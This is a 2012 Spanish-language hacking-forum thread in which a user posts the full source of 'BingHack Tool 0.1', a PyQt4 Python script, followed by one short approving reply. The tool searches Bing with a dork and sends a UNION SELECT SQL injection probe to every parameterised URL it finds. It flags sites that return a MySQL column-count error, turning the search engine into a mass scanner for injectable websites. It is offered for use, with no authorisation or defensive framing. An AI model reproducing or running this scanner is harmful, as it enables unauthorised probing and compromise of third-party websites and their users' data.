Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: BigBear en 3 Noviembre 2012, 15:39 pm



Título: [PyQT4] BingHack Tool 0.1
Publicado por: BigBear en 3 Noviembre 2012, 15:39 pm
Un simple script para buscar en bing paginas vulnerables a SQLi.

(http://doddyhackman.webcindario.com/images/bingpy.jpg)

El codigo

Código
  1. #!usr/bin/python
  2. #BingHack Tool 0.1
  3. #Coded By Doddy H
  4.  
  5. import sys,urllib2,re
  6. from PyQt4 import QtCore,QtGui
  7.  
  8. def toma(web) :
  9. nave = urllib2.Request(web)
  10. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  11. op = urllib2.build_opener()
  12. return op.open(nave).read()
  13.  
  14. def sql(webs):
  15. for web in webs :
  16.  if re.findall("=",web):
  17.   web = re.split("=",web)
  18.   web = web[0]+"="
  19.   app.processEvents()
  20.   try:
  21.    code = toma(web+"-1+union+select+1--")
  22.    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  23.     new.console.appendPlainText("[SQLI] : "+web)
  24.   except:
  25.    pass
  26.  
  27. def limpiar(pag):
  28.  
  29. limpia = []
  30. for p in pag:
  31.  if p not in limpia:
  32.   limpia.append(p)
  33. return limpia
  34.  
  35. def buscar(dork,count):
  36.  
  37. pag = []
  38. s = 10  
  39.  
  40. new.console.appendPlainText("[+] Searching pages ....")
  41.  
  42. while s <= int(count):
  43.  try:
  44.   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  45.   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  46.   s += 10
  47.   for a in d:
  48.    pag.append(a)
  49.  except:
  50.   pass
  51.  
  52. new.console.appendPlainText("[+] Cleaning ...")
  53.  
  54. pag = limpiar(pag)
  55. return pag
  56.  
  57. def scan():
  58.  
  59. new.console.clear()
  60. pages = buscar(new.dork.text(),new.pages.text())
  61. new.console.appendPlainText("[+] Scanning ...\n")
  62. sql(pages)
  63. new.console.appendPlainText("\n[+] Finished")
  64.  
  65. app = QtGui.QApplication(sys.argv)
  66.  
  67. new = QtGui.QWidget()
  68.  
  69. new.setWindowTitle("BingHack Tool 0.1 || Coded By Doddy H")
  70. new.resize(450,470)
  71. new.setStyleSheet("QWidget {background-color: #000000;color: #FF8000}")
  72.  
  73. new.label1 = QtGui.QLabel("Dork : ",new)
  74. new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
  75. new.label1.setGeometry(30,23,80,20)
  76.  
  77. new.dork = QtGui.QLineEdit(new)
  78. new.dork.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
  79. new.dork.setGeometry(90,23,200,25)
  80.  
  81. new.label1 = QtGui.QLabel("Pages : ",new)
  82. new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
  83. new.label1.setGeometry(30,60,80,20)
  84.  
  85. new.pages = QtGui.QLineEdit(new)
  86. new.pages.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
  87. new.pages.setGeometry(100,60,50,25)
  88.  
  89. new.search = QtGui.QPushButton("Scan",new)
  90. new.search.setGeometry(305,22,110,28)
  91. new.search.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
  92.  
  93. new.label2 = QtGui.QLabel("Console",new)
  94. new.label2.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
  95. new.label2.setGeometry(185,110,70,20)
  96.  
  97. new.console = QtGui.QPlainTextEdit(new)
  98. new.console.setGeometry(50,150,350,300)
  99. new.console.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
  100.  
  101. new.connect(new.search,QtCore.SIGNAL("clicked()"),scan)
  102.  
  103. new.show()
  104.  
  105. sys.exit(app.exec_())
  106.  
  107. # The End ?
  108.  


Título: Re: [PyQT4] BingHack Tool 0.1
Publicado por: Stakewinner00 en 3 Noviembre 2012, 15:45 pm
de los 3 que he visto este me parece el mas interesante.

Cuando tenga tiempo lo provare